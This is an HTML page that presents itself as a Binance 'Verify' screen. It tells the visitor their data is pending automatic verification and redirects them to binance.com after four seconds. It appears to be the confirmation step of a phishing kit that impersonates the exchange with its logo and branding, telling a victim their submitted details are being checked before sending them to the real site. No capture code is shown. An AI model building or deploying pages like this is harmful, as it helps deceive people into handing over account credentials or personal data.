<!DOCTYPE html>
<html>
<head>
    <meta charset='utf-8'>
    <meta http-equiv="refresh" content="4; url=https://binance.com">
    <meta http-equiv='X-UA-Compatible' content='IE=edge'>
    <title>Verify | Binance</title>
    <meta name='viewport' content='width=device-width, initial-scale=1'>
    <link rel='stylesheet' type='text/css' media='screen' href='style.css'>
    <link rel="icon" href="img/icon.png">
    <script src='main.js'></script>
</head>
<body>
    <img class="logo" src="img/logo.png">
    
    <div class="container" id="container">
        <div class="form-container">
            <h2 class="verify-txt">Verification in Progress</h2>

            <p class="label" id="label2">
                Your data is pending automatic verification. You will be redirected to the Log In page shortly.
            </p>
                   
               
                
                <div class="input-group">
                    
                    <button class="next-btn" id="next-btn" type="text">Ok</button>
                </div>
            
              
                
            
        </div>
    </div>
    <footer>
        <p>Binance &copy; 2024</p>
        <p>Cookie Preferences</p>
    </footer>
</body>
</html>